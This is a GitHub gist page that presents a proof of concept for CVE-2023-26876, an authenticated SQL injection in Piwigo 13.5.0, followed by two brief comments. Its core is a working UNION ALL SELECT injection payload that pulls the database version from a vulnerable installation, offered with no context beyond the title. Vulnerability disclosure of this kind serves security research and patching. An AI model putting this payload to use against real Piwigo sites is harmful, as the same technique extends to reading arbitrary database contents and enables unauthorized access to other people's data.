Skip to content

Instantly share code, notes, and snippets.

@rodnt
Created April 18, 2023 14:03
Embed
What would you like to do?
POC - Authenticated SQL injection Piwigo 13.5.0 - CVE-2023-26876

POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --

@rodnt
Copy link
Author

rodnt commented Apr 18, 2023

sqli-piwigo

@ajakk
Copy link

ajakk commented Apr 24, 2023

So where's the upstream report?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment